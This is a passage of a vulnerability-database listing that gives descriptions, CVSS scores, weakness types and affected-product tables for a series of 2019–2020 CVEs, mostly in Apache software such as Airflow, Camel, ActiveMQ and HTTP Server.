Some HTTP/2 implementations are vulnerable to a header leak, potentially leading to a denial of service. The attacker sends a stream of headers with a 0-length header name and 0-length header value, optionally Huffman encoded into 1-byte or greater headers. Some implementations allocate memory for these headers and keep the allocation alive until the session dies. This can consume excess memory.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,CWE-770,

Products Affected

Vendor Product Version
canonical ubuntu_linux 19.04
redhat quay 3.0.0
canonical ubuntu_linux 18.04
oracle graalvm 19.2.0
opensuse leap 15.1
debian debian_linux 10.0
apache traffic_server *
redhat jboss_core_services 1.0
f5 nginx *
apple swiftnio *
fedoraproject fedora 32
redhat openshift_service_mesh 1.0
fedoraproject fedora 29
nodejs node.js *
opensuse leap 15.0
debian debian_linux 9.0
redhat enterprise_linux 8.0
synology vs960hd_firmware -
redhat jboss_enterprise_application_platform 7.2.0
synology skynas -
redhat jboss_enterprise_application_platform 7.3.0
canonical ubuntu_linux 16.04
synology diskstation_manager 6.2
mcafee web_gateway *
fedoraproject fedora 30
redhat software_collections 1.0
CVE-2019-9517 HIGH

Some HTTP/2 implementations are vulnerable to unconstrained interal data buffering, potentially leading to a denial of service. The attacker opens the HTTP/2 window so the peer can send without constraint; however, they leave the TCP window closed so the peer cannot actually write (many of) the bytes on the wire. The attacker then sends a stream of requests for a large response object. Depending on how the servers queue the responses, this can consume excess memory, CPU, or both.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-400,CWE-770,

Products Affected

Vendor Product Version
canonical ubuntu_linux 19.04
apache http_server *
oracle instantis_enterprisetrack *
redhat quay 3.0.0
canonical ubuntu_linux 18.04
oracle graalvm 19.2.0
opensuse leap 15.1
debian debian_linux 10.0
apache traffic_server *
redhat jboss_core_services 1.0
netapp clustered_data_ontap -
apple swiftnio *
oracle communications_element_manager 8.0.0
oracle communications_element_manager 8.1.1
oracle retail_xstore_point_of_service 7.1
redhat openshift_service_mesh 1.0
oracle communications_element_manager 8.1.0
fedoraproject fedora 29
nodejs node.js *
opensuse leap 15.0
debian debian_linux 9.0
redhat enterprise_linux 8.0
synology vs960hd_firmware -
redhat jboss_enterprise_application_platform 7.2.0
synology skynas -
redhat jboss_enterprise_application_platform 7.3.0
oracle communications_element_manager 8.2.0
canonical ubuntu_linux 16.04
synology diskstation_manager 6.2
mcafee web_gateway *
fedoraproject fedora 30
redhat software_collections 1.0
CVE-2019-9518 HIGH

Some HTTP/2 implementations are vulnerable to a flood of empty frames, potentially leading to a denial of service. The attacker sends a stream of frames with an empty payload and without the end-of-stream flag. These frames can be DATA, HEADERS, CONTINUATION and/or PUSH_PROMISE. The peer spends time processing each frame disproportionate to attack bandwidth. This can consume excess CPU.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: HIGH

Problem Type: CWE-400,CWE-770,

Products Affected

Vendor Product Version
canonical ubuntu_linux 19.04
redhat quay 3.0.0
canonical ubuntu_linux 18.04
oracle graalvm 19.2.0
opensuse leap 15.1
debian debian_linux 10.0
apache traffic_server *
redhat jboss_core_services 1.0
apple swiftnio *
redhat openshift_service_mesh 1.0
fedoraproject fedora 29
nodejs node.js *
opensuse leap 15.0
debian debian_linux 9.0
redhat enterprise_linux 8.0
synology vs960hd_firmware -
redhat jboss_enterprise_application_platform 7.2.0
synology skynas -
redhat jboss_enterprise_application_platform 7.3.0
canonical ubuntu_linux 16.04
synology diskstation_manager 6.2
mcafee web_gateway *
fedoraproject fedora 30
redhat software_collections 1.0
CVE-2020-10727 LOW

A flaw was found in ActiveMQ Artemis management API from version 2.7.0 up until 2.12.0, where a user inadvertently stores passwords in plaintext in the Artemis shadow file (etc/artemis-users.properties file) when executing the `resetUsers` operation. A local attacker can use this flaw to read the contents of the Artemis shadow file.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 1.8 3.6

CVSS 2.0

Severity: LOW

Problem Type: CWE-312,CWE-522,

Products Affected

Vendor Product Version
apache activemq_artemis *
netapp oncommand_workflow_automation -
CVE-2020-11969 MEDIUM

If Apache TomEE is configured to use the embedded ActiveMQ broker, and the broker URI includes the useJMX=true parameter, a JMX port is opened on TCP port 1099, which does not include authentication. This affects Apache TomEE 8.0.0-M1 - 8.0.1, Apache TomEE 7.1.0 - 7.1.2, Apache TomEE 7.0.0-M1 - 7.0.7, Apache TomEE 1.0.0 - 1.7.5.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-306,

Products Affected

Vendor Product Version
apache tomee *
apache tomee 7.0.0
apache tomee 8.0.0
CVE-2020-11971 MEDIUM

Apache Camel's JMX is vulnerable to Rebind Flaw. Apache Camel 2.22.x, 2.23.x, 2.24.x, 2.25.x, 3.0.0 up to 3.1.0 is affected. Users should upgrade to 3.2.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
oracle enterprise_manager_base_platform 13.4.0.0
apache camel *
oracle flexcube_private_banking 12.0.0
oracle communications_diameter_intelligence_hub *
oracle communications_diameter_signaling_router *
oracle flexcube_private_banking 12.1.0
oracle enterprise_manager_base_platform 13.3.0.0
CVE-2020-11972 HIGH

Apache Camel RabbitMQ enables Java deserialization by default. Apache Camel 2.22.x, 2.23.x, 2.24.x, 2.25.0, 3.0.0 up to 3.1.0 are affected. 2.x users should upgrade to 2.25.1, 3.x users should upgrade to 3.2.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
oracle enterprise_manager_base_platform 13.4.0.0
apache camel *
oracle flexcube_private_banking 12.0.0
oracle communications_diameter_signaling_router *
oracle flexcube_private_banking 12.1.0
oracle enterprise_manager_base_platform 13.3.0.0
CVE-2020-11973 HIGH

Apache Camel Netty enables Java deserialization by default. Apache Camel 2.22.x, 2.23.x, 2.24.x, 2.25.0, 3.0.0 up to 3.1.0 are affected. 2.x users should upgrade to 2.25.1, 3.x users should upgrade to 3.2.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
oracle enterprise_manager_base_platform 13.4.0.0
apache camel *
oracle flexcube_private_banking 12.0.0
oracle communications_diameter_signaling_router *
oracle flexcube_private_banking 12.1.0
oracle enterprise_manager_base_platform 13.3.0.0
CVE-2020-11974 HIGH

In DolphinScheduler 1.2.0 and 1.2.1, with mysql connectorj a remote code execution vulnerability exists when choosing mysql as database.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache dolphinscheduler 1.2.0
apache dolphinscheduler 1.2.1
CVE-2020-11975 HIGH

Apache Unomi allows conditions to use OGNL scripting which offers the possibility to call static Java classes from the JDK that could execute code with the permission level of the running Java process.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache unomi *
CVE-2020-11976 MEDIUM

By crafting a special URL it is possible to make Wicket deliver unprocessed HTML templates. This would allow an attacker to see possibly sensitive information inside a HTML template that is usually removed during rendering. Affected are Apache Wicket versions 7.16.0, 8.8.0 and 9.0.0-M5

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-552,

Products Affected

Vendor Product Version
apache fortress 2.0.5
apache wicket *
apache wicket 9.0.0
CVE-2020-11977 HIGH

In Apache Syncope 2.1.X releases prior to 2.1.7, when the Flowable extension is enabled, an administrator with workflow entitlements can use Shell Service Tasks to perform malicious operations, including but not limited to file read, file write, and code execution.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.2 HIGH CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 1.2 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache syncope *
CVE-2020-11978 MEDIUM

An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-78,CWE-78,

Products Affected

Vendor Product Version
apache airflow *
CVE-2020-11979 MEDIUM

As mitigation for CVE-2020-1945 Apache Ant 1.10.8 changed the permissions of temporary files it created so that only the current user was allowed to access them. Unfortunately the fixcrlf task deleted the temporary file and created a new one without said protection, effectively nullifying the effort. This would still allow an attacker to inject modified source files into the build process.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-379,NVD-CWE-Other,

Products Affected

Vendor Product Version
oracle api_gateway 11.1.2.4.0
oracle banking_platform 2.4.1
oracle real-time_decision_server 3.2.0.0
oracle agile_engineering_data_management 6.2.1.0
oracle retail_eftlink 19.0.1
oracle communications_unified_inventory_management 7.4.0
oracle endeca_information_discovery_studio 3.2.0.0
oracle retail_item_planning 16.0.3
oracle retail_service_backbone 15.0.3
oracle utilities_framework 4.4.0.0.0
oracle data_integrator 12.2.1.4.0
oracle primavera_gateway *
oracle retail_merchandising_system 16.0.3
oracle utilities_framework 4.3.0.5.0
oracle primavera_unifier *
oracle retail_xstore_point_of_service 18.0.3
oracle financial_services_analytical_applications_infrastructure 8.1.0
oracle retail_financial_integration 14.1.3
oracle retail_service_backbone 14.1.3
oracle retail_xstore_point_of_service 16.0.6
oracle retail_advanced_inventory_planning 14.1
oracle retail_assortment_planning 16.0.3
oracle storagetek_tape_analytics 2.4
oracle primavera_unifier 18.8
oracle retail_xstore_point_of_service 17.0.4
oracle primavera_unifier 16.1
gradle gradle *
oracle retail_eftlink 20.0.0
oracle retail_predictive_application_server 14.1
oracle retail_financial_integration 16.0.3
oracle retail_store_inventory_management 14.1.3.9
oracle primavera_unifier 19.12
oracle retail_xstore_point_of_service 15.0.4
oracle banking_treasury_management 14.4
oracle banking_platform 2.6.2
oracle retail_merchandise_financial_planning 16.0.3
oracle retail_financial_integration 15.0.3
oracle retail_regular_price_optimization 16.0.3
oracle banking_platform 2.7.1
oracle flexcube_private_banking 12.1.0
oracle utilities_framework 4.4.0.2.0
oracle retail_macro_space_optimization 16.0.3
oracle retail_merchandising_system 14.1.3.2
oracle enterprise_repository 11.1.1.7.0
oracle banking_platform 2.7.0
oracle storagetek_acsls 8.5.1
oracle timesten_in-memory_database *
oracle retail_service_backbone 16.0.3
oracle financial_services_analytical_applications_infrastructure *
oracle retail_store_inventory_management 15.0.3.0
oracle retail_category_management_planning_&_optimization 16.0.3
oracle communications_unified_inventory_management 7.4.1
fedoraproject fedora 32
oracle primavera_unifier 16.2
oracle retail_store_inventory_management 16.0.3.0
oracle retail_replenishment_optimization 16.0.3
oracle flexcube_private_banking 12.0.0
oracle retail_integration_bus 15.0.3
oracle utilities_framework 4.3.0.6.0
oracle real-time_decision_server 11.1.1.9.0
oracle primavera_unifier 20.12
oracle retail_xstore_point_of_service 19.0.2
apache ant 1.10.8
fedoraproject fedora 31
oracle banking_platform 2.8.0
oracle data_integrator 12.2.1.3.0
oracle retail_size_profile_optimization 16.0.3
oracle banking_platform 2.4.0
oracle financial_services_analytical_applications_infrastructure 8.1.1
fedoraproject fedora 33
CVE-2020-11980 MEDIUM

In Karaf, JMX authentication takes place using JAAS and authorization takes place using ACL files. By default, only an "admin" can actually invoke on an MBean. However there is a vulnerability there for someone who is not an admin, but has a "viewer" role. In the 'etc/jmx.acl.cfg', such as role can call get*. It's possible to authenticate as a viewer role + invokes on the MLet getMBeansFromURL method, which goes off to a remote server to fetch the desired MBean, which is then registered in Karaf. At this point the attack fails as "viewer" doesn't have the permission to invoke on the MBean. Still, it could act as a SSRF style attack and also it essentially allows a "viewer" role to pollute the MBean registry, which is a kind of privilege escalation. The vulnerability is low as it's possible to add a ACL to limit access. Users should update to Apache Karaf 4.2.9 or newer.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L 2.8 3.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-918,

Products Affected

Vendor Product Version
apache karaf *
CVE-2020-11981 HIGH

An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-78,

Products Affected

Vendor Product Version
apache airflow *
CVE-2020-11982 HIGH

An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attack can connect to the broker (Redis, RabbitMQ) directly, it was possible to insert a malicious payload directly to the broker which could lead to a deserialization attack (and thus remote code execution) on the Worker.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache airflow *
CVE-2020-11983 LOW

An issue was found in Apache Airflow versions 1.10.10 and below. It was discovered that many of the admin management screens in the new/RBAC UI handled escaping incorrectly, allowing authenticated users with appropriate permissions to create stored XSS attacks.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 2.3 2.7

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache airflow *
CVE-2020-11984 HIGH

Apache HTTP server 2.4.32 to 2.4.44 mod_proxy_uwsgi info disclosure and possible RCE

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-120,

Products Affected

Vendor Product Version
apache http_server *
oracle communications_session_route_manager *
canonical ubuntu_linux 18.04
oracle hyperion_infrastructure_technology 11.1.2.4
debian debian_linux 9.0
opensuse leap 15.1
opensuse leap 15.2
oracle instantis_enterprisetrack 17.1
debian debian_linux 10.0
oracle enterprise_manager_ops_center 12.4.0.0
netapp clustered_data_ontap -
oracle communications_session_report_manager *
fedoraproject fedora 32
canonical ubuntu_linux 16.04
fedoraproject fedora 31
canonical ubuntu_linux 20.04
oracle zfs_storage_appliance_kit 8.8
oracle instantis_enterprisetrack 17.2
oracle instantis_enterprisetrack 17.3
oracle communications_element_manager *
CVE-2020-11985 MEDIUM

IP address spoofing when proxying using mod_remoteip and mod_rewrite For configurations using proxying with mod_remoteip and certain mod_rewrite rules, an attacker could spoof their IP address for logging and PHP scripts. Note this issue was fixed in Apache HTTP Server 2.4.24 but was retrospectively allocated a low severity CVE in 2020.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-345,CWE-345,

Products Affected

Vendor Product Version
apache http_server *
CVE-2020-11986 HIGH

To be able to analyze gradle projects, the build scripts need to be executed. Apache NetBeans follows this pattern. This causes the code of the build script to be invoked at load time of the project. Apache NetBeans up to and including 12.0 did not request consent from the user for the analysis of the project at load time. This in turn will run potentially malicious code, from an external source, without the consent of the user.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache netbeans *
CVE-2020-11987 MEDIUM

Apache Batik 1.13 is vulnerable to server-side request forgery, caused by improper input validation by the NodePickerPanel. By using a specially-crafted argument, an attacker could exploit this vulnerability to cause the underlying server to make arbitrary GET requests.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.2 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N 3.9 4.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,CWE-918,

Products Affected

Vendor Product Version
oracle communications_application_session_controller 3.9m0p3
oracle communications_metasolv_solution 6.3.0
oracle communications_metasolv_solution 6.3.1
apache batik *
oracle enterprise_repository 11.1.1.7.0
oracle banking_apis 21.1
oracle instantis_enterprisetrack 17.1
oracle flexcube_universal_banking *
oracle agile_engineering_data_management 6.2.1.0
debian debian_linux 10.0
oracle retail_central_office 14.1
fedoraproject fedora 34
oracle banking_digital_experience 20.1
oracle banking_digital_experience 18.3
oracle instantis_enterprisetrack 17.3
oracle banking_digital_experience 19.1
oracle weblogic_server 12.2.1.4.0
oracle product_lifecycle_analytics 3.6.1
oracle weblogic_server 12.2.1.3.0
oracle retail_order_broker 15.0
oracle banking_digital_experience 21.1
oracle retail_order_management_system_cloud_service 19.5
oracle insurance_policy_administration *
oracle retail_returns_management 14.1
oracle retail_order_broker 16.0
oracle banking_digital_experience 19.2
oracle communications_offline_mediation_controller 12.0.0.3.0
oracle banking_apis 19.1
oracle retail_point-of-service 14.1
oracle banking_apis 19.2
oracle fusion_middleware_mapviewer 12.2.1.4.0
oracle weblogic_server 14.1.1.0.0
oracle instantis_enterprisetrack 17.2
oracle retail_back_office 14.1
oracle banking_apis 18.3
fedoraproject fedora 33
oracle banking_apis 20.1
CVE-2020-11988 MEDIUM

Apache XmlGraphics Commons 2.4 and earlier is vulnerable to server-side request forgery, caused by improper input validation by the XMPParser. By using a specially-crafted argument, an attacker could exploit this vulnerability to cause the underlying server to make arbitrary GET requests. Users should upgrade to 2.6 or later.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.2 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N 3.9 4.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,CWE-918,

Products Affected

Vendor Product Version
fedoraproject fedora 34
apache xmlgraphics_commons *
fedoraproject fedora 33
CVE-2020-11989 HIGH

Apache Shiro before 1.5.3, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache shiro *
CVE-2020-11990 LOW

We have resolved a security issue in the camera plugin that could have affected certain Cordova (Android) applications. An attacker who could install (or lead the victim to install) a specially crafted (or malicious) Android application would be able to access pictures taken with the app externally.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 3.3 LOW CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 1.8 1.4

CVSS 2.0

Severity: LOW

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache cordova 4.1.0
CVE-2020-11991 MEDIUM

When using the StreamGenerator, the code parse a user-provided XML. A specially crafted XML, including external system entities, could be used to access any file on the server system.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache cocoon *
CVE-2020-11993 MEDIUM

Apache HTTP Server versions 2.4.20 to 2.4.43 When trace/debug was enabled for the HTTP/2 module and on certain traffic edge patterns, logging statements were made on the wrong connection, causing concurrent use of memory pools. Configuring the LogLevel of mod_http2 above "info" will mitigate this vulnerability for unpatched servers.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-444,

Products Affected

Vendor Product Version
apache http_server *
oracle communications_session_route_manager *
canonical ubuntu_linux 18.04
oracle hyperion_infrastructure_technology 11.1.2.4
opensuse leap 15.1
opensuse leap 15.2
oracle instantis_enterprisetrack 17.1
debian debian_linux 10.0
oracle enterprise_manager_ops_center 12.4.0.0
netapp clustered_data_ontap -
oracle communications_session_report_manager *
fedoraproject fedora 32
canonical ubuntu_linux 16.04
fedoraproject fedora 31
canonical ubuntu_linux 20.04
oracle zfs_storage_appliance_kit 8.8
oracle instantis_enterprisetrack 17.2
oracle instantis_enterprisetrack 17.3
oracle communications_element_manager *
CVE-2020-11994 MEDIUM

Server-Side Template Injection and arbitrary file disclosure on Camel templating components

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-74,

Products Affected

Vendor Product Version
apache camel 2.25.1
oracle enterprise_repository 11.1.1.7.0
oracle enterprise_manager_base_platform 13.4.0.0
apache camel *
oracle communications_diameter_signaling_router *
apache camel 2.25.0
CVE-2020-11995 HIGH

A deserialization vulnerability existed in dubbo 2.7.5 and its earlier versions, which could lead to malicious code execution. Most Dubbo users use Hessian2 as the default serialization/deserialization protool, during Hessian2 deserializing the HashMap object, some functions in the classes stored in HasMap will be executed after a series of program calls, however, those special functions may cause remote command execution. For example, the hashCode() function of the EqualsBean class in rome-1.7.0.jar will cause the remotely load malicious classes and execute malicious code by constructing a malicious request. This issue was fixed in Apache Dubbo 2.6.9 and 2.7.8.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,CWE-502,

Products Affected

Vendor Product Version
apache dubbo *
CVE-2020-11996 MEDIUM

A specially crafted sequence of HTTP/2 requests sent to Apache Tomcat 10.0.0-M1 to 10.0.0-M5, 9.0.0.M1 to 9.0.35 and 8.5.0 to 8.5.55 could trigger high CPU usage for several seconds. If a sufficient number of such requests were made on concurrent HTTP/2 connections, the server could become unresponsive.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
oracle siebel_ui_framework *
debian debian_linux 9.0
opensuse leap 15.1
opensuse leap 15.2
oracle workload_manager 18c
apache tomcat 10.0.0
debian debian_linux 10.0
oracle workload_manager 19c
netapp oncommand_system_manager 3.1.3
oracle workload_manager 12.2.0.1
apache tomcat *
canonical ubuntu_linux 20.04
apache tomcat 9.0.0
oracle mysql_enterprise_monitor *
netapp oncommand_system_manager 3.0
CVE-2020-11997 MEDIUM

Apache Guacamole 1.2.0 and earlier do not consistently restrict access to connection history based on user visibility. If multiple users share access to the same connection, those users may be able to see which other users have accessed that connection, as well as the IP addresses from which that connection was accessed, even if those users do not otherwise have permission to see other users.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-276,

Products Affected

Vendor Product Version
apache guacamole *
CVE-2020-11998 HIGH

A regression has been introduced in the commit preventing JMX re-bind. By passing an empty environment map to RMIConnectorServer, instead of the map that contains the authentication credentials, it leaves ActiveMQ open to the following attack: https://docs.oracle.com/javase/8/docs/technotes/guides/management/agent.html "A remote client could create a javax.management.loading.MLet MBean and use it to create new MBeans from arbitrary URLs, at least if there is no security manager. In other words, a rogue remote client could make your Java application execute arbitrary code." Mitigation: Upgrade to Apache ActiveMQ 5.15.13

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
oracle communications_session_report_manager *
oracle communications_session_route_manager *
oracle enterprise_repository 11.1.1.7.0
oracle flexcube_private_banking 12.0.0
oracle communications_diameter_signaling_router *
apache activemq 5.15.12
oracle communications_element_manager *
oracle flexcube_private_banking 12.1.0
CVE-2020-13920 MEDIUM

Apache ActiveMQ uses LocateRegistry.createRegistry() to create the JMX RMI registry and binds the server to the "jmxrmi" entry. It is possible to connect to the registry without authentication and call the rebind method to rebind jmxrmi to something else. If an attacker creates another server to proxy the original, and bound that, he effectively becomes a man in the middle and is able to intercept the credentials when an user connects. Upgrade to Apache ActiveMQ 5.15.12.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N 2.2 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-306,

Products Affected

Vendor Product Version
apache activemq *
debian debian_linux 9.0
oracle flexcube_private_banking 12.0.0
oracle communications_diameter_signaling_router *
oracle flexcube_private_banking 12.1.0
CVE-2020-13921 HIGH

**Resolved** Only when using H2/MySQL/TiDB as Apache SkyWalking storage, there is a SQL injection vulnerability in the wildcard query cases.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-89,

Products Affected

Vendor Product Version
apache skywalking 6.6.0
apache skywalking 7.0.0
apache skywalking 8.0.1
apache skywalking 6.5.0
apache skywalking 8.0.0
CVE-2020-13922 MEDIUM

Versions of Apache DolphinScheduler prior to 1.3.2 allowed an ordinary user under any tenant to override another users password through the API interface.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,CWE-276,

Products Affected

Vendor Product Version
apache dolphinscheduler 1.3.1
apache dolphinscheduler 1.2.0
apache dolphinscheduler 1.2.1
CVE-2020-13923 MEDIUM

IDOR vulnerability in the order processing feature from ecommerce component of Apache OFBiz before 17.12.04

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-639,

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2020-13924 MEDIUM

In Apache Ambari versions 2.6.2.2 and earlier, malicious users can construct file names for directory traversal and traverse to other directories to download files.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

